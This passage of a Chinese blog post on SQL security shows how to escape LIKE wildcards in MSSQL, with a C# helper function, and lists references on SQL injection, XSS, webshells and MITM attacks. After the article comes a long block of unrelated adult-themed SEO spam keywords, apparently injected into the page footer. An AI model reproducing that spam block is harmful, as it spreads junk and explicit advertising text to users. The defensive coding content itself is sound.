          網上有這樣的說法,不過我在MSSQL中使用 ctrl+L 執行語法查看索引使用情況卻都沒有使用索引,可能在別的數據庫中會使用到索引吧……

          截圖如下:

          有兩種將通配符轉義為普通字符的方法:

          1) 使用ESCAPE關鍵字定義轉義符(通用)

          在模式中,當轉義符置于通配符之前時,該通配符就解釋為普通字符。例如,要搜索在任意位置包含字符串 5% 的字符串,請使用:

          WHERE ColumnA LIKE '%5/%%' ESCAPE '/'

          2) 在方括號 ([ ]) 中只包含通配符本身,或要搜索破折號 (-) 而不是用它指定搜索范圍,請將破折號指定為方括號內的第一個字符。EG:


          符號

          含義


          LIKE '5[%]'

          5%


          LIKE '5%'

          5 后跟 0 個或多個字符的字符串


          LIKE '[_]n'

          _n


          LIKE '_n'

          an, in, on (and so on)


          LIKE '[a-cdf]'

          a、b、c、d 或 f


          LIKE '[-acdf]'

          -、a、c、d 或 f


          LIKE '[ [ ]'

          [


          LIKE ']'

          ] (右括號不需要轉義)


          所以,進行過輸入參數的關鍵字過濾后,還需要做下面轉換確保LIKE的正確執行



          private static string ConvertSqlForLike(string sql)

          {

          sql=sql.Replace("[", "[[]"); // 這句話一定要在下面兩個語句之前,否則作為轉義符的方括號會被當作數據被再次處理

          sql=sql.Replace("_", "[_]");

          sql=sql.Replace("%", "[%]");

          return sql;

          }


          結束語:感謝你耐心的觀看。恭喜你, SQL安全攻防你已經入門了……


          參考文獻:

          SQL注入天書

          (百度百科)SQL注入

          擴展資料:

          Sql Server 編譯、重編譯與執行計劃重用原理

          淺析Sql Server參數化查詢-----驗證了參數的類型和長度對參數化查詢影響

          Sql Server參數化查詢之where in和like實現詳解

          -----講述6種參數化實現方案

          webshell -----不當小白,你必須認識的專業術語。一個用于站長管理,入侵者入侵的好工具

          SQL注入技術和跨站腳本攻擊的檢測 -----講解使用正則表達式檢測注入

          XSS(百度百科) -------惡意攻擊者往Web頁面里插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執行,從而達到惡意用戶的特殊目的。

          XSS攻擊實例 -------基本思路:我們都知道網上很多網站都可以“記住你的用戶名和密碼”或是“自動登錄”,其實是在你的本地設置了一個cookie,這種方式可以讓你免去每次都輸入用戶名和口令的痛苦,但是也帶來很大的問題。試想,如果某用戶在“自動登錄”的狀態下,如果你運行了一個程序,這個程序訪問“自動登錄”這個網站上一些鏈接、提交一些表單,那么,也就意味著這些程序不需要輸入用戶名和口令的手動交互就可以和服務器上的程序通話。

          Web安全測試之XSS

          Web API 入門指南 - 閑話安全

          中間人攻擊(MITM)姿勢總結

          淺談WEB安全性(前端向)


          主站蜘蛛池模板: 2022年亚洲午夜一区二区福利| 欧洲无码一区二区三区在线观看| 精品免费国产一区二区三区| 日韩人妻一区二区三区蜜桃视频| 国产91一区二区在线播放不卡| 福利视频一区二区牛牛| 美女视频免费看一区二区| 日韩精品一区二区三区老鸭窝| 精品日韩亚洲AV无码一区二区三区| 日韩精品一区二区三区国语自制 | 日本一区中文字幕日本一二三区视频| 在线观看亚洲一区二区| 大伊香蕉精品一区视频在线| 成人区人妻精品一区二区不卡视频| 国产日产久久高清欧美一区| 亚洲av色香蕉一区二区三区蜜桃| 国产精品自拍一区| 日本一区二区在线播放| 射精专区一区二区朝鲜| 2021国产精品一区二区在线| 国产经典一区二区三区蜜芽| 亚洲变态另类一区二区三区 | 国产成人久久一区二区三区| 国产伦精品一区二区| 青娱乐国产官网极品一区| 久久国产精品一区| 亚洲国产精品无码久久一区二区| 乱精品一区字幕二区| 成人精品一区二区电影| 性色AV 一区二区三区| 国模私拍一区二区三区| 日本免费一区二区三区| 亚洲av无码一区二区三区四区| 日美欧韩一区二去三区| 亚洲国产一区视频| 亚洲福利视频一区| 国产一区二区在线| 一级特黄性色生活片一区二区| 中文字幕Av一区乱码| 午夜影院一区二区| 色系一区二区三区四区五区|